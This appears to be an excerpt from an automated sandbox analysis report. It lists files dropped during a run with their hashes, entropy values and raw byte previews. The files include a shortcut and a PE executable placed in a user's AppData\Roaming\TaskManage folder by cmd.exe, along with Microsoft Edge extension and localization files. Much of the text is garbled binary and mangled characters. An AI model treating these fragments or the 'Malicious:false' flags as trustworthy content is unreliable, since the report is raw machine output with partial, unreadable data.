                                                                                                                                                            Preview:L..................F.... .......`....;.`....]@.^....b.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....?.`...G..`......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^&Z|............................%..A.p.p.D.a.t.a...B.V.1.....&Z....Roaming.@......CW.^&Z............................;.P.R.o.a.m.i.n.g.....^.1.....&Z....TASKMA~1..F......&Z..&Z...............................T.a.s.k.M.a.n.a.g.e.....r.2...b.#Zl. .RESCUE~1.EXE..V......&Z..&Z................................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......k...............-.......j............7.......C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.a.s.k.M.a.n.a.g.e.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......284992...........hT..CrF.f4... .`.T..b...,.......hT..CrF.f4... .`.T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2602496
                                                                                                                                                            Entropy (8bit):6.716476069650749
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                            MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                            SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                            SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                            SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1753
                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9815
                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):10388
                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):962
                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11185
                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):154477
                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):4982
Entropy (8bit):7.929761711048726
Encrypted:false
SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:913064ADAAA4C4FA2A9D011B66B33183
SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:false
Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):908
Entropy (8bit):4.512512697156616
Encrypted:false
SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:12403EBCCE3AE8287A9E823C0256D205
SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:false
Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1285
Entropy (8bit):4.702209356847184
Encrypted:false
SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:58979859B28513608626B563138097DC19236F1F
SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:false
Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1244
Entropy (8bit):4.5533961615623735
Encrypted:false
SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:false
Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):977
Entropy (8bit):4.867640976960053
Encrypted:false
SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:9A798FD298008074E59ECC253E2F2933
SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:false
Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3107
Entropy (8bit):3.535189746470889
Encrypted:false
SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:68884DFDA320B85F9FC5244C2DD00568
SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:false
Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1389
Entropy (8bit):4.561317517930672
Encrypted:false
SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:2E6423F38E148AC5A5A041B1D5989CC0
SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:false
Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1763
Entropy (8bit):4.25392954144533
Encrypted:false
SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:651375C6AF22E2BCD228347A45E3C2C9
SHA1:109AC3A912326171D77869854D7300385F6E628C
SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:false
Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):930
Entropy (8bit):4.569672473374877
Encrypted:false
SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:D177261FFE5F8AB4B3796D26835F8331
SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:false
Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):913
Entropy (8bit):4.947221919047
Encrypted:false
SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:false
